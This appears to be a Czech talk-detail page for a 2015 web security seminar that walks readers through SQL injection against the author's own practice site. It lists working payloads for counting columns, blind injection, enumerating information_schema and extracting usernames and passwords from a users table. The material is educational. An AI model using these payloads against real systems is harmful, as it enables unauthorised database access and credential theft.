Check the online version, I often update my slides.

Talk detail

Několik nejčastějších bezpečnostních chyb a jak se proti nim bránit a co všechno udělat pro to, abychom měli všichni klidnější spaní.

SQL Injection si můžete zkusit na mém testovacím webu na adrese http://exploited.cz/…products.php. Měl by vás zajímat parametr id, který je sice ošetřen pomocí mysql_real_escape_string(), ale v tomto případě to není nic platné, protože aplikace očekává číslo a vstup není uzavřen do apostrofů. Jeho změnou můžete zkusit:

  1. zjistit počet sloupců v dotazu SELECT ... FROM:
    • id=1 ORDER BY 1
    • id=1 ORDER BY 5
    • id=1 UNION SELECT 1,2,3,4
  2. ověřit Blind SQL Injection:
    • id=1 AND 1=1
    • id=1 AND 1=2
    • id=1 AND SUBSTRING(VERSION(),1,6)=0x352e352e3238
  3. zjistit, nějaké informace:
    • aktuální databázi a verzi serveru: id=1 UNION SELECT 1,DATABASE(),VERSION(),4
    • jména tabulek a sloupců, ke kterým má uživatel přístup id=1 UNION SELECT 1,table_name,column_name,4 FROM information_schema.columns
  4. zjistit uživatelská jména a špatně uložená hesla:
    • id=1 UNION SELECT 1,username,password,4 FROM users

Přijďte si o webové bezpečnosti pro vývojáře popovídat na školení Bezpečnost PHP aplikací (June 2019 Praha). Vytváříte bezpečná hesla a máte zabezpečený prohlížeč? Že nevíte jak na to? Prozradím vám to na školení Bezpečnost pro uživatele (termín zatím nevypsán).

Date and event

March 6, 2015, Seminář Web Inkognito na VŠE 2015